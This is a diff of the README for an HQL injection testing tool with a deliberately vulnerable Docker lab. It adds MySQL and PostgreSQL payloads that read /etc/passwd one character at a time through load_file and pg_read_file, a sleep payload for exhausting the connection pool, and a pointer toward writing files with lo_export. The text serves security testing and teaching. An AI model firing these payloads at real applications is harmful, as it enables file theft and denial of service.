pdstat/hqli/README.md

 ## Other attack vectors

 Thanks to HQL's `function()` support, you can also try to detect the database vendor and version (see the `--detect-db` flag), and potentially exploit further via SQL functions.
-Here are some examples I've discovered across the different DBs supported by this project.:
+Here are some examples I've discovered across the different DBs supported by this project:

+### MySQL/MariaDB

+#### File read

+You can read files from the filesystem using the `load_file` function.
+For example, to read the `/etc/passwd` file, you can use the following payload:

+True: (char at position 1 is 'r')

+`x' or function('substring', function('load_file','/etc/passwd'), 1, 1) = 'r' or '1'='2`

+True: (char at position 2 is 'o')

+`x' or function('substring', function('load_file','/etc/passwd'), 2, 1) = 'o' or '1'='2`

+True: (char at position 3 is 'o')

+`x' or function('substring', function('load_file','/etc/passwd'), 3, 1) = 'o' or '1'='2`

+True: (char at position 4 is 't')

+`x' or function('substring', function('load_file','/etc/passwd'), 4, 1) = 't' or '1'='2`

+etc.

+Note the MySQL user has to be granted the `FILE` privilege to read files outside of the MySQL data directory.
+In this project the `hqli` user is granted this privilege in the `docker/mysql/init.sql` file.
+The `--secure-file-priv=` option in the `docker-compose.yml` file disables the secure file privilege restriction, allowing reading files from anywhere the MySQL server user has access to.

+#### Availability

+You can also use the `sleep` function to cause a delay in the response, which could be used for a denial of service attack.
+For example, to sleep for 10 seconds, you can use the following payload:

+`x' or (function('sleep',10)=0) or '1'='2`

+Sending this continuously will flood the JDBC connection pool and cause a denial of service.
+See the `flood.py` script for an example of how to do this.

 ### PostgreSQL

-### File read
+#### File read

 Similar to how this projects script exfiltrates data via boolean HQLi, you can also read files from the filesystem using the `pg_read_file` function.
 For example, to read the `/etc/passwd` file, you can use the following payload:

 True: (char at position 1 is 'r')

 `x' or function('substring', function('pg_read_file','/etc/passwd'), 1, 1) = 'r' or '1'='2`

 True: (char at position 2 is 'o')

 `x' or function('substring', function('pg_read_file','/etc/passwd'), 2, 1) = 'o' or '1'='2`

 True: (char at position 3 is 'o')

 `x' or function('substring', function('pg_read_file','/etc/passwd'), 3, 1) = 'o' or '1'='2`

 True: (char at position 4 is 't')

 `x' or function('substring', function('pg_read_file','/etc/passwd'), 4, 1) = 't' or '1'='2`

 etc.

-### File write
+#### File write

-#### Writing 'large objects' to the filesystem
+##### Writing 'large objects' to the filesystem

 In PostgreSQL you can write files to the filesystem using the `lo_export` function, which exports a large object to a file.